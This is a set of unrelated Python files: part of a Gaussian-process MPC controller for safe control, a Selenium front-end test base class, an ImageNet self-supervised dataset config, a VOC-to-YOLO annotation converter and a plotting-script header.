self.seed = seed
self.prob = prob
self.sparse_gp = sparse_gp
if input_mask is None:
self.input_mask = np.arange(self.model.nx + self.model.nu).tolist()
else:
self.input_mask = input_mask
if target_mask is None:
self.target_mask = np.arange(self.model.nx).tolist()
else:
self.target_mask = target_mask
Bd = np.eye(self.model.nx)
self.Bd = Bd[:, self.target_mask]
self.gp_approx = gp_approx
self.online_learning = online_learning
self.last_obs = None
self.last_action = None
self.initial_rollout_std = initial_rollout_std
def setup_prior_dynamics(self):
"""Computes the LQR gain used for propograting GP uncertainty from the prior model dynamics.
"""
# Determine the LQR gain K to propogate the input uncertainty (doing this at each timestep will increase complexity).
A, B = discretize_linear_system(self.prior_ctrl.dfdx, self.prior_ctrl.dfdu, self.dt)
Q_lqr = self.Q
R_lqr = self.R
P = scipy.linalg.solve_discrete_are(A, B, Q_lqr, R_lqr)
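        # Standard discrete-time LQR gain: K = -(R + B^T P B)^{-1} B^T P A, with P the DARE solution above.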
btp = np.dot(B.T, P)
self.lqr_gain = -np.dot(np.linalg.inv(self.R + np.dot(btp, B)), np.dot(btp, A))
self.discrete_dfdx = A
self.discrete_dfdu = B
def set_gp_dynamics_func(self):
"""Updates symbolic dynamics.
With actual control frequency, initialize GP model and add to the combined dynamics.
"""
self.setup_prior_dynamics()
# Compute the probabilistic constraint inverse CDF according to section III.D.b in Hewing 2019.
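        # The expression below simplifies to norm.ppf(1 - (1 - prob) / (2 * nx)),
        # i.e. the total allowed violation probability (1 - prob) is split evenly
        # across the nx state dimensions, two-sided.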
self.inverse_cdf = scipy.stats.norm.ppf(1 - (1/self.model.nx - (self.prob + 1)/(2*self.model.nx)))
self.create_sparse_GP_machinery()
def create_sparse_GP_machinery(self):
"""This setups the gaussian process approximations for FITC formulation.
"""
lengthscales, signal_var, noise_var, gp_K_plus_noise = self.gaussian_process.get_hyperparameters(as_numpy=True)
self.length_scales = lengthscales.squeeze()
self.signal_var = signal_var.squeeze()
self.noise_var = noise_var.squeeze()
self.gp_K_plus_noise = gp_K_plus_noise
Nx = len(self.input_mask)
Ny = len(self.target_mask)
N = self.gaussian_process.n_training_samples
# Create CasADI function for computing the kernel K_z_zind with parameters for z, z_ind, length scales and signal variance.
        # We need the CasADi version of this so that it can be symbolically differentiated in the MPC optimization.
z1 = cs.SX.sym('z1', Nx)
z2 = cs.SX.sym('z2', Nx)
ell_s = cs.SX.sym('ell', Nx)
sf2_s = cs.SX.sym('sf2')
z_ind = cs.SX.sym('z_ind', self.T, Nx)
covSE = cs.Function('covSE', [z1, z2, ell_s, sf2_s],
[covSEard(z1, z2, ell_s, sf2_s)])
ks = cs.SX.zeros(1, self.T)
for i in range(self.T):
ks[i] = covSE(z1, z_ind[i, :], ell_s, sf2_s)
ks_func = cs.Function('K_s', [z1, z_ind, ell_s, sf2_s], [ks])
K_z_zind = cs.SX.zeros(Ny, self.T)
for i in range(Ny):
K_z_zind[i,:] = ks_func(z1, z_ind, self.length_scales[i,:], self.signal_var[i])
        # This will be multiplied by the mean_post_factor computed at every time step to compute the approximate mean.
self.K_z_zind_func = cs.Function('K_z_zind', [z1, z_ind],[K_z_zind],['z1', 'z2'],['K'])
def preprocess_training_data(self,
x_seq,
u_seq,
x_next_seq
):
"""Converts trajectory data for GP trianing.
Args:
x_seq (list): state sequence of np.array (nx,).
u_seq (list): action sequence of np.array (nu,).
x_next_seq (list): next state sequence of np.array (nx,).
Returns:
np.array: inputs for GP training, (N, nx+nu).
np.array: targets for GP training, (N, nx).
"""
        # Get the predicted dynamics. This is a linear prior, so we need to account for the fact that
        # it is linearized about an equilibrium point (self.prior_ctrl.X_LIN, self.prior_ctrl.U_LIN).
x_pred_seq = self.prior_dynamics_func(x0=x_seq.T - self.prior_ctrl.X_LIN[:, None],
p=u_seq.T - self.prior_ctrl.U_LIN[:,None])['xf'].toarray()
targets = (x_next_seq.T - (x_pred_seq+self.prior_ctrl.X_LIN[:,None])).transpose() # (N, nx).
inputs = np.hstack([x_seq, u_seq]) # (N, nx+nu).
return inputs, targets
def precompute_probabilistic_limits(self,
print_sets=True
):
"""This updates the constraint value limits to account for the uncertainty in the dynamics rollout.
Args:
print_sets (bool): True to print out the sets for debugging purposes.
"""
nx, nu = self.model.nx, self.model.nu
T = self.T
state_covariances = np.zeros((self.T+1, nx, nx))
input_covariances = np.zeros((self.T, nu, nu))
        # Initialize lists for the tightening of each constraint.
state_constraint_set = []
for state_constraint in self.constraints.state_constraints:
state_constraint_set.append(np.zeros((state_constraint.num_constraints, T+1)))
input_constraint_set = []
for input_constraint in self.constraints.input_constraints:
input_constraint_set.append(np.zeros((input_constraint.num_constraints, T)))
if self.x_prev is not None and self.u_prev is not None:
cov_x = np.diag([self.initial_rollout_std**2]*nx)
for i in range(T):
state_covariances[i] = cov_x
cov_u = self.lqr_gain @ cov_x @ self.lqr_gain.T
input_covariances[i] = cov_u
cov_xu = cov_x @ self.lqr_gain.T
z = np.hstack((self.x_prev[:,i], self.u_prev[:,i]))
if self.gp_approx == 'taylor':
raise NotImplementedError("Taylor GP approximation is currently not working.")
elif self.gp_approx == 'mean_eq':
_, cov_d_tensor = self.gaussian_process.predict(z[None,:], return_pred=False)
cov_d = cov_d_tensor.detach().numpy()
else:
raise NotImplementedError('gp_approx method is incorrect or not implemented')
                # Loop through input constraints and tighten by the required amount.
for ui, input_constraint in enumerate(self.constraints.input_constraints):
input_constraint_set[ui][:, i] = -1*self.inverse_cdf * \
np.absolute(input_constraint.A) @ np.sqrt(np.diag(cov_u))
for si, state_constraint in enumerate(self.constraints.state_constraints):
state_constraint_set[si][:, i] = -1*self.inverse_cdf * \
np.absolute(state_constraint.A) @ np.sqrt(np.diag(cov_x))
if self.gp_approx == 'taylor':
raise NotImplementedError("Taylor GP rollout not implemented.")
elif self.gp_approx == 'mean_eq':
                    # Compute the next-step propagated state covariance using mean equivalence.
cov_x = self.discrete_dfdx @ cov_x @ self.discrete_dfdx.T + \
self.discrete_dfdx @ cov_xu @ self.discrete_dfdu.T + \
self.discrete_dfdu @ cov_xu.T @ self.discrete_dfdx.T + \
self.discrete_dfdu @ cov_u @ self.discrete_dfdu.T + \
self.Bd @ cov_d @ self.Bd.T
else:
raise NotImplementedError('gp_approx method is incorrect or not implemented')
            # Update final covariance.
for si, state_constraint in enumerate(self.constraints.state_constraints):
state_constraint_set[si][:,-1] = -1 * self.inverse_cdf * \
np.absolute(state_constraint.A) @ np.sqrt(np.diag(cov_x))
state_covariances[-1] = cov_x
if print_sets:
print("Probabilistic State Constraint values along Horizon:")
print(state_constraint_set)
print("Probabilistic Input Constraint values along Horizon:")
print(input_constraint_set)
self.results_dict['input_constraint_set'].append(input_constraint_set)
self.results_dict['state_constraint_set'].append(state_constraint_set)
self.results_dict['state_horizon_cov'].append(state_covariances)
self.results_dict['input_horizon_cov'].append(input_covariances)
return state_constraint_set, input_constraint_set
def precompute_sparse_gp_values(self):
"""Uses the last MPC solution to precomupte values associated with the FITC GP approximation.
"""
n_data_points = self.gaussian_process.n_training_samples
dim_gp_inputs = len(self.input_mask)
dim_gp_outputs = len(self.target_mask)
inputs = self.train_data['train_inputs']
targets = self.train_data['train_targets']
# Get the inducing points.
if self.x_prev is not None and self.u_prev is not None:
# Use the previous MPC solution as in Hewing 2019.
z_ind = np.hstack((self.x_prev[:,:-1].T, self.u_prev.T))
z_ind = z_ind[:,self.input_mask]
else:
            # If there is no previous solution, choose T random training set points.
inds = self.env.np_random.choice(range(n_data_points), size=self.T)
#z_ind = self.data_inputs[inds][:, self.input_mask]
z_ind = inputs[inds][:, self.input_mask]
K_zind_zind = self.gaussian_process.kernel(torch.Tensor(z_ind).double())
K_zind_zind_inv = self.gaussian_process.kernel_inv(torch.Tensor(z_ind).double())
K_x_zind = self.gaussian_process.kernel(torch.from_numpy(inputs[:, self.input_mask]).double(),
torch.Tensor(z_ind).double())
Q_X_X = K_x_zind @ K_zind_zind_inv @ K_x_zind.transpose(1,2)
Gamma = torch.diagonal(self.gaussian_process.K_plus_noise + Q_X_X, 0, 1, 2)
Gamma_inv = torch.diag_embed(1/Gamma)
Sigma = torch.pinverse(K_zind_zind + K_x_zind.transpose(1,2) @ Gamma_inv @ K_x_zind)
mean_post_factor = torch.zeros((dim_gp_outputs, self.T))
for i in range(dim_gp_outputs):
mean_post_factor[i] = Sigma[i] @ K_x_zind[i].T @ Gamma_inv[i] @ \
torch.from_numpy(targets[:,self.target_mask[i]]).double()
return mean_post_factor.detach().numpy(), Sigma.detach().numpy(), K_zind_zind_inv.detach().numpy(), z_ind
def setup_gp_optimizer(self):
"""Sets up nonlinear optimization problem including cost objective, variable bounds and dynamics constraints.
"""
nx, nu = self.model.nx, self.model.nu
T = self.T
# Define optimizer and variables.
opti = cs.Opti()
# States.
x_var = opti.variable(nx, T + 1)
# Inputs.
u_var = opti.variable(nu, T)
# Initial state.
x_init = opti.parameter(nx, 1)
# Reference (equilibrium point or trajectory, last step for terminal cost).
x_ref = opti.parameter(nx, T + 1)
# Chance constraint limits.
state_constraint_set = []
for state_constraint in self.constraints.state_constraints:
state_constraint_set.append(opti.parameter(state_constraint.num_constraints, T+1))
input_constraint_set = []
for input_constraint in self.constraints.input_constraints:
input_constraint_set.append(opti.parameter(input_constraint.num_constraints, T))
# Sparse GP mean postfactor matrix.
mean_post_factor = opti.parameter(len(self.target_mask), T)
# Sparse GP inducing points.
z_ind = opti.parameter(T, len(self.input_mask))
# Cost (cumulative).
cost = 0
cost_func = self.model.loss
for i in range(T):
cost += cost_func(x=x_var[:, i],
u=u_var[:, i],
Xr=x_ref[:, i],
Ur=np.zeros((nu, 1)),
Q=self.Q,
R=self.R)["l"]
# Terminal cost.
cost += cost_func(x=x_var[:, -1],
u=np.zeros((nu, 1)),
Xr=x_ref[:, -1],
Ur=np.zeros((nu, 1)),
Q=self.Q,
R=self.R)["l"]
opti.minimize(cost)
z = cs.vertcat(x_var[:,:-1], u_var)
z = z[self.input_mask,:]
for i in range(self.T):
# Dynamics constraints using the dynamics of the prior and the mean of the GP.
# This follows the tractable dynamics formulation in Section III.B in Hewing 2019.
# Note that for the GP approximation, we are purposely using elementwise multiplication *.
if self.sparse_gp:
next_state = self.prior_dynamics_func(x0=x_var[:, i]-self.prior_ctrl.X_LIN[:,None],
p=u_var[:, i]-self.prior_ctrl.U_LIN[:,None])['xf'] + \
self.prior_ctrl.X_LIN[:,None]+ self.Bd @ cs.sum2(self.K_z_zind_func(z1=z[:,i].T, z2=z_ind)['K'] * mean_post_factor)
else:
                # The sparse GP approximation doesn't always work well, so use exact GP regression instead. This is much slower,
                # but for unstable systems it can make performance much better.
next_state = self.prior_dynamics_func(x0=x_var[:, i]-self.prior_ctrl.X_LIN[:,None],
p=u_var[:, i]-self.prior_ctrl.U_LIN[:,None])['xf'] + \
self.prior_ctrl.X_LIN[:,None]+ self.Bd @ self.gaussian_process.casadi_predict(z=z[:,i])['mean']
opti.subject_to(x_var[:, i + 1] == next_state)
# Probabilistic state and input constraints according to Hewing 2019 constraint tightening.
for s_i, state_constraint in enumerate(self.state_constraints_sym):
opti.subject_to(state_constraint(x_var[:, i]) <= state_constraint_set[s_i][:,i])
for u_i, input_constraint in enumerate(self.input_constraints_sym):
opti.subject_to(input_constraint(u_var[:, i]) <= input_constraint_set[u_i][:,i])
# Final state constraints.
for s_i, state_constraint in enumerate(self.state_constraints_sym):
opti.subject_to(state_constraint(x_var[:, -1]) <= state_constraint_set[s_i][:,-1])
# Initial condition constraints.
opti.subject_to(x_var[:, 0] == x_init)
# Create solver (IPOPT solver in this version).
opts = {"ipopt.print_level": 4,
"ipopt.sb": "yes",
"ipopt.max_iter": 100, #100,
"print_time": 1}
opti.solver('ipopt', opts)
self.opti_dict = {
"opti": opti,
"x_var": x_var,
"u_var": u_var,
"x_init": x_init,
"x_ref": x_ref,
"state_constraint_set": state_constraint_set,
"input_constraint_set": input_constraint_set,
"mean_post_factor": mean_post_factor,
"z_ind": z_ind,
"cost": cost
}
def select_action_with_gp(self,
obs
):
"""Solves nonlinear MPC problem to get next action.
Args:
obs (np.array): current state/observation.
Returns:
np.array: input/action to the task/env.
"""
opti_dict = self.opti_dict
opti = opti_dict["opti"]
x_var = opti_dict["x_var"]
u_var = opti_dict["u_var"]
x_init = opti_dict["x_init"]
x_ref = opti_dict["x_ref"]
state_constraint_set = opti_dict["state_constraint_set"]
input_constraint_set = opti_dict["input_constraint_set"]
mean_post_factor = opti_dict["mean_post_factor"]
z_ind = opti_dict["z_ind"]
cost = opti_dict["cost"]
# Assign the initial state.
opti.set_value(x_init, obs)
# Assign reference trajectory within horizon.
goal_states = self.get_references()
opti.set_value(x_ref, goal_states)
if self.mode == "tracking":
self.traj_step += 1
# Set the probabilistic state and input constraint set limits.
state_constraint_set_prev, input_constraint_set_prev = self.precompute_probabilistic_limits()
for si in range(len(self.constraints.state_constraints)):
opti.set_value(state_constraint_set[si], state_constraint_set_prev[si])
for ui in range(len(self.constraints.input_constraints)):
opti.set_value(input_constraint_set[ui], input_constraint_set_prev[ui])
mean_post_factor_val, Sigma, K_zind_zind_inv, z_ind_val = self.precompute_sparse_gp_values()
opti.set_value(mean_post_factor, mean_post_factor_val)
opti.set_value(z_ind, z_ind_val)
# Initial guess for the optimization problem.
if self.warmstart and self.x_prev is not None and self.u_prev is not None:
# shift previous solutions by 1 step
x_guess = deepcopy(self.x_prev)
u_guess = deepcopy(self.u_prev)
x_guess[:, :-1] = x_guess[:, 1:]
u_guess[:-1] = u_guess[1:]
opti.set_initial(x_var, x_guess)
opti.set_initial(u_var, u_guess)
# Solve the optimization problem.
try:
sol = opti.solve()
x_val, u_val = sol.value(x_var), sol.value(u_var)
except RuntimeError:
x_val, u_val = opti.debug.value(x_var), opti.debug.value(u_var)
u_val = np.atleast_2d(u_val)
self.x_prev = x_val
self.u_prev = u_val
self.results_dict['horizon_states'].append(deepcopy(self.x_prev))
self.results_dict['horizon_inputs'].append(deepcopy(self.u_prev))
zi = np.hstack((x_val[:,0], u_val[:,0]))
zi = zi[self.input_mask]
gp_contribution = np.sum(self.K_z_zind_func(z1=zi, z2=z_ind_val)['K'].toarray() * mean_post_factor_val,axis=1)
print("GP Mean eq Contribution: %s" % gp_contribution)
zi = np.hstack((x_val[:,0], u_val[:,0]))
pred, _, _ = self.gaussian_process.predict(zi[None,:])
print("True GP value: %s" % pred.numpy())
lin_pred = self.prior_dynamics_func(x0=x_val[:,0]-self.prior_ctrl.X_LIN,
p=u_val[:, 0]-self.prior_ctrl.U_LIN)['xf'].toarray() + \
self.prior_ctrl.X_LIN[:,None]
self.results_dict['linear_pred'].append(lin_pred)
self.results_dict['gp_mean_eq_pred'].append(gp_contribution)
self.results_dict['gp_pred'].append(pred.numpy())
# Take the first one from solved action sequence.
if u_val.ndim > 1:
action = u_val[:, 0]
else:
action = np.array([u_val[0]])
        self.prev_action = action
return action
def learn(self,
input_data=None,
target_data=None,
gp_model=None,
plot=False
):
"""Performs GP training.
Args:
            input_data, target_data (optional, np.array): data to use for training.
gp_model (str): if not None, this is the path to pretrained models to use instead of training new ones.
plot (bool): to plot validation trajectories or not.
Returns:
training_results (dict): Dictionary of the training results.
"""
if gp_model is None:
gp_model = self.gp_model_path
self.prior_ctrl.remove_constraints(self.prior_ctrl.additional_constraints)
self.reset()
if self.online_learning:
input_data = np.zeros((self.train_iterations, len(self.input_mask)))
target_data = np.zeros((self.train_iterations, len(self.target_mask)))
if input_data is None and target_data is None:
train_inputs = []
train_targets = []
train_info = []
############
            # Use Latin Hypercube Sampling to generate states within environment bounds.
lhs_sampler = Lhs(lhs_type='classic', criterion='maximin')
limits = [(self.env.INIT_STATE_RAND_INFO[key].low, self.env.INIT_STATE_RAND_INFO[key].high) for key in
self.env.INIT_STATE_RAND_INFO]
# todo: parameterize this if we actually want it.
num_eq_samples = 0
samples = lhs_sampler.generate(limits,
self.train_iterations + self.validation_iterations - num_eq_samples,
random_state=self.seed)
# todo: choose if we want eq samples or not.
delta = 0.01
eq_limits = [(self.prior_ctrl.X_LIN[eq]-delta, self.prior_ctrl.X_LIN[eq]+delta) for eq in range(self.model.nx)]
if num_eq_samples > 0:
eq_samples = lhs_sampler.generate(eq_limits, num_eq_samples, random_state=self.seed)
#samples = samples.append(eq_samples)
init_state_samples = np.array(samples + eq_samples)
else:
init_state_samples = np.array(samples)
input_limits = np.vstack((self.constraints.input_constraints[0].lower_bounds,
self.constraints.input_constraints[0].upper_bounds)).T
input_samples = lhs_sampler.generate(input_limits,
self.train_iterations + self.validation_iterations,
random_state=self.seed)
input_samples = np.array(input_samples) # not being used currently
seeds = self.env.np_random.randint(0,99999, size=self.train_iterations + self.validation_iterations)
load_from_file = False
if load_from_file:
gpmpc_data = np.load("/home/erl/repos/journal_zhichao/safe-control-gym/experiments/annual_reviews/figure6/data/small_drone/statecontroldata_rand_good1.npz")
x_seq_all = gpmpc_data["x_seq_all"]
x_next_seq_all = gpmpc_data["x_next_seq_all"]
u_seq_all = gpmpc_data["u_seq_all"]
else:
x_seq_all = []
u_seq_all = []
x_next_seq_all = []
for i in range(self.train_iterations + self.validation_iterations):
if load_from_file:
x_seq = x_seq_all[i]
x_next_seq = x_next_seq_all[i]
u_seq = u_seq_all[i]
else:
# For random initial state training.
init_state = init_state_samples[i,:]
# Collect data with prior controller.
run_env = self.env_func(init_state=init_state, randomized_init=False, seed=int(seeds[i]))
episode_results = self.prior_ctrl.run(env=run_env, max_steps=1, gp_training = True)
run_env.close()
x_obs = episode_results['obs'][-3:,:]
u_seq = episode_results['action'][-1:,:]
x_seq = x_obs[:-1,:]
x_next_seq = x_obs[1:,:]
x_seq_all.append(x_seq)
x_next_seq_all.append(x_next_seq)
u_seq_all.append(u_seq)
train_inputs_i, train_targets_i = self.preprocess_training_data(x_seq, u_seq, x_next_seq)
train_inputs.append(train_inputs_i)
train_targets.append(train_targets_i)
np.savez("/home/erl/repos/journal_zhichao/safe-control-gym/experiments/annual_reviews/figure6/data/small_drone/statecontroldata_rand.npz", x_seq_all = x_seq_all, x_next_seq_all = x_next_seq_all, u_seq_all = u_seq_all)
###########
else:
train_inputs = input_data
train_targets = target_data
# assign all data
train_inputs = np.vstack(train_inputs)
train_targets = np.vstack(train_targets)
self.data_inputs = train_inputs
self.data_targets = train_targets
train_idx, test_idx = train_test_split(
#list(range(self.train_iterations + self.validation_iterations)),
list(range(train_inputs.shape[0])),
test_size=self.validation_iterations/(self.train_iterations+self.validation_iterations),
random_state=self.seed
)
train_inputs = self.data_inputs[train_idx, :]
train_targets = self.data_targets[train_idx, :]
self.train_data = {'train_inputs': train_inputs, 'train_targets': train_targets}
test_inputs = self.data_inputs[test_idx, :]
test_targets = self.data_targets[test_idx, :]
self.test_data = {'test_inputs': test_inputs, 'test_targets': test_targets}
train_inputs_tensor = torch.Tensor(train_inputs).double()
train_targets_tensor = torch.Tensor(train_targets).double()
test_inputs_tensor = torch.Tensor(test_inputs).double()
test_targets_tensor = torch.Tensor(test_targets).double()
if plot:
init_state = np.array([-1.0, 0.0, 0.0, 0.0, 0.0, 0.0])
valid_env = self.env_func(init_state=init_state,
randomized_init=False)
validation_results = self.prior_ctrl.run(env=valid_env,
max_steps=40)
valid_env.close()
x_obs = validation_results['obs']
u_seq = validation_results['action']
x_seq = x_obs[:-1, :]
x_next_seq = x_obs[1:, :]
# Define likelihood.
likelihood = gpytorch.likelihoods.GaussianLikelihood(
noise_constraint=gpytorch.constraints.GreaterThan(1e-6),
).double()
self.gaussian_process = GaussianProcessCollection(ZeroMeanIndependentGPModel,
likelihood,
len(self.target_mask),
input_mask=self.input_mask,
target_mask=self.target_mask,
normalize=self.normalize_training_data
)
if gp_model:
self.gaussian_process.init_with_hyperparam(train_inputs_tensor,
train_targets_tensor,
gp_model)
else:
# Train the GP.
self.gaussian_process.train(train_inputs_tensor,
train_targets_tensor,
test_inputs_tensor,
test_targets_tensor,
n_train=self.optimization_iterations,
learning_rate=self.learning_rate,
gpu=self.use_gpu,
dir=self.output_dir)
# Plot validation.
if plot:
validation_inputs, validation_targets = self.preprocess_training_data(x_seq, u_seq, x_next_seq)
fig_count = 0
fig_count = self.gaussian_process.plot_trained_gp(torch.Tensor(validation_inputs).double(),
torch.Tensor(validation_targets).double(),
fig_count=fig_count)
self.set_gp_dynamics_func()
self.setup_gp_optimizer()
self.prior_ctrl.add_constraints(self.prior_ctrl.additional_constraints)
self.prior_ctrl.reset()
# Collect training results.
training_results = {}
training_results['train_targets'] = train_targets
training_results['train_inputs'] = train_inputs
try:
training_results['info'] = train_info
except UnboundLocalError:
training_results['info'] = None
return training_results
def select_action(self,
obs
):
"""Select the action based on the given observation.
Args:
obs (np.array): current observed state.
Returns:
action (np.array): desired policy action.
"""
if self.gaussian_process is None:
action = self.prior_ctrl.select_action(obs)
else:
            if self.last_obs is not None and self.last_action is not None and self.online_learning:
print("[ERROR]: Not yet supported.")
exit()
t1 = time.perf_counter()
action = self.select_action_with_gp(obs)
t2 = time.perf_counter()
print("GP SELECT ACTION TIME: %s" %(t2 - t1))
self.last_obs = obs
self.last_action = action
return action
def close(self):
"""Clean up.
"""
self.env_training.close()
self.env.close()
def reset_results_dict(self):
"""
"""
"Result the results_dict before running."
super().reset_results_dict()
self.results_dict['input_constraint_set'] = []
self.results_dict['state_constraint_set'] = []
self.results_dict['state_horizon_cov'] = []
self.results_dict['input_horizon_cov'] = []
self.results_dict['gp_mean_eq_pred'] = []
self.results_dict['gp_pred'] = []
self.results_dict['linear_pred'] = []
def reset(self):
"""Reset the controller before running.
"""
# Setup reference input.
if self.env.TASK == Task.STABILIZATION:
self.mode = "stabilization"
self.x_goal = self.env.X_GOAL
elif self.env.TASK == Task.TRAJ_TRACKING:
self.mode = "tracking"
self.traj = self.env.X_GOAL.T
self.traj_step = 0
# Dynamics model.
if self.gaussian_process is not None:
self.set_gp_dynamics_func()
# CasADi optimizer.
self.setup_gp_optimizer()
self.prior_ctrl.reset()
# Previously solved states & inputs, useful for warm start.
self.x_prev = None
self.u_prev = None
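# --- Hedged numeric sketch (illustrative only, not part of the controller) ---
# The matrices below are made up; they only demonstrate the two formulas used in
# precompute_probabilistic_limits(): the mean-equivalence covariance propagation
# and the chance-constraint tightening via the inverse CDF from set_gp_dynamics_func().
if __name__ == "__main__":
    import scipy.stats as sps
    nx, nu = 2, 1
    A = np.array([[1.0, 0.1], [0.0, 1.0]])   # hypothetical discrete dfdx
    B = np.array([[0.005], [0.1]])           # hypothetical discrete dfdu
    K = np.array([[-0.5, -0.8]])             # hypothetical LQR gain
    Bd_demo = np.eye(nx)
    cov_x = np.diag([0.005**2] * nx)         # initial rollout covariance
    cov_d = np.diag([1e-4] * nx)             # GP predictive covariance (made up)
    cov_u = K @ cov_x @ K.T
    cov_xu = cov_x @ K.T
    # One step of the mean-equivalence covariance propagation.
    cov_x_next = (A @ cov_x @ A.T + A @ cov_xu @ B.T + B @ cov_xu.T @ A.T
                  + B @ cov_u @ B.T + Bd_demo @ cov_d @ Bd_demo.T)
    # Tightening of a single state constraint a^T x <= b.
    prob = 0.955
    inverse_cdf = sps.norm.ppf(1 - (1 - prob) / (2 * nx))
    a = np.array([1.0, 0.0])
    tightening = inverse_cdf * np.absolute(a) @ np.sqrt(np.diag(cov_x_next))
    print("Propagated state covariance:\n", cov_x_next)
    print("Constraint tightening:", tightening)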
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Public Library of Science
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import unittest
import random
from teamcity import is_running_under_teamcity
from teamcity.unittestpy import TeamcityTestRunner
from .WebDriverFactory import WebDriverFactory
__author__ = 'jkrzemien@plos.org'
class FrontEndTest(unittest.TestCase):
"""
Base class to provide Front End tests with desired WebDriver instances, as defined in
[[Config.py]].
It inherits from `TestCase` in order to count as a test suite for Python's `unittest` framework.
"""
# This defines any `FrontEndTest` derived class as able to be run by Nose in a parallel way.
# Requires Nose's `MultiProcess` plugin to be *enabled*
_multiprocess_can_split_ = True
# Will contain a single driver instance for the current test
_driver = None
# Will contain a list of driver (not instantiated) for the current test variations
# (for all browsers)
_injected_drivers = []
# Factory object to instantiate drivers
factory = WebDriverFactory()
def setUp(self):
pass
def tearDown(self):
"""
Method in charge of destroying the WebDriver/Proxy instances
once the test finished running (even upon test failure).
"""
if self._driver:
self._driver.quit()
else:
self.factory.teardown_webdriver()
def getDriver(self):
"""
    Simple method to retrieve the WebDriver/Proxy instance for this class's test methods.
"""
if not self._driver:
if len(self._injected_drivers) > 0:
self._driver = self.factory.setup_remote_webdriver(self._injected_drivers.pop())
else:
self._driver = self.factory.setup_webdriver()
return self._driver
@staticmethod
def _run_tests_randomly():
"""
*Static* method for every test suite inheriting this class to be able to run its tests
    in, at least, a non-linear fashion.
"""
unittest.TestLoader.sortTestMethodsUsing = lambda _, x, y: random.choice([-1, 1])
if is_running_under_teamcity():
runner = TeamcityTestRunner()
else:
runner = unittest.TextTestRunner()
unittest.main(testRunner=runner)
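# --- Hedged usage sketch (not part of the original PLOS suite) ---
# A hypothetical concrete test case: it only needs to request a driver from the
# base class. The URL and assertion below are placeholders.
class ExampleHomepageTest(FrontEndTest):

    def test_homepage_has_title(self):
        driver = self.getDriver()
        driver.get('https://www.example.org/')
        self.assertTrue(len(driver.title) > 0)

if __name__ == '__main__':
    ExampleHomepageTest._run_tests_randomly()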
|
# dataset settings
data_source = 'ImageNet'
dataset_type = 'RotationPredDataset'
img_norm_cfg = dict(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
train_pipeline = [
dict(type='RandomResizedCrop', size=224),
dict(type='RandomHorizontalFlip'),
]
test_pipeline = [
dict(type='Resize', size=256),
dict(type='CenterCrop', size=224),
]
# prefetch
prefetch = False
if not prefetch:
train_pipeline.extend(
[dict(type='ToTensor'),
dict(type='Normalize', **img_norm_cfg)])
test_pipeline.extend(
[dict(type='ToTensor'),
dict(type='Normalize', **img_norm_cfg)])
# dataset summary
data = dict(
samples_per_gpu=16, # (16*4) x 8 = 512
workers_per_gpu=2,
train=dict(
type=dataset_type,
data_source=dict(
type=data_source,
data_prefix='data/imagenet/train',
ann_file='data/imagenet/meta/train.txt',
),
pipeline=train_pipeline,
prefetch=prefetch),
val=dict(
type=dataset_type,
data_source=dict(
type=data_source,
data_prefix='data/imagenet/val',
ann_file='data/imagenet/meta/val.txt',
),
pipeline=test_pipeline,
prefetch=prefetch))
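# Hedged note (illustrative, not part of this config): in the mmcv config
# system a downstream config typically inherits a base file like this one and
# overrides only what changes, e.g. (file name hypothetical):
#   _base_ = 'rotation_pred_imagenet_base.py'
#   data = dict(samples_per_gpu=32)  # doubles the per-GPU batch size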
|
import argparse
from xml.etree import ElementTree as ET
import os
from pickle import dump
from tqdm import tqdm
parser = argparse.ArgumentParser()
parser.add_argument("dir")
parser.add_argument("save")
args = parser.parse_args()
path = os.path.join(args.dir)
classes_nums = {"cat" : 0 , "dog" : 1}
keys = list(classes_nums.keys())
try:
os.mkdir(args.save)
except FileExistsError:
    print("Folder already exists!")
def ToMidPoint(x1 , y1 , x2 , y2 , size):
dw = 1.0 / size[0]
dh = 1.0 / size[1]
h = y2 - y1
w = x2 - x1
x = (x1 + (w/2))
y = (y1 + (h/2))
return x * dw , y * dh , w * dw , h * dh
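# Hedged worked example (comment only): for a 500x400 image, a box with corners
# (x1, y1) = (50, 100) and (x2, y2) = (150, 300) gives the normalized YOLO tuple
# ToMidPoint(50, 100, 150, 300, (500, 400)) ≈ (0.2, 0.5, 0.2, 0.5).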
for File in tqdm(os.listdir(path)):
obj_list = 0
xml_path = os.path.join(path , File)
file_name = "{}/{}".format(args.save , File.replace("xml" , "txt"))
tree = ET.parse(xml_path)
root = tree.getroot()
size = root.find('size')
w_img = int(size.find('width').text)
h_img = int(size.find('height').text)
with open(file_name , "w") as F :
for obj in root.iter("object"):
class_name = obj.find("name").text
if class_name not in keys:
continue
obj_list += 1
class_id = classes_nums[class_name]
xml_box = obj.find("bndbox")
            needed = ["xmin", "ymin", "xmax", "ymax"]
            x1, y1 = float(xml_box.find(needed[0]).text), float(xml_box.find(needed[1]).text)
            x2, y2 = float(xml_box.find(needed[2]).text), float(xml_box.find(needed[3]).text)
x , y , w , h = ToMidPoint(x1 , y1 , x2 , y2 , (w_img , h_img))
F.write("{} {} {} {} {}\n".format(class_id , x , y , w , h))
if obj_list == 0:
os.remove(file_name)
|
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 4 2020
@Author: PouyaRZ
____________________________________________________
Plots to produce:
1. LCC of equipment for each scenario for all the individuals
2. SCC of equipment for each scenario for all the individuals
3. SCC vs LCC scatter plot
4. SCC vs chiller type
5. SCC vs CHP type
6. LCC vs chiller type
7. LCC vs CHP type
8. Traces of building types across all the runs
____________________________________________________
"""
import pandas as pd
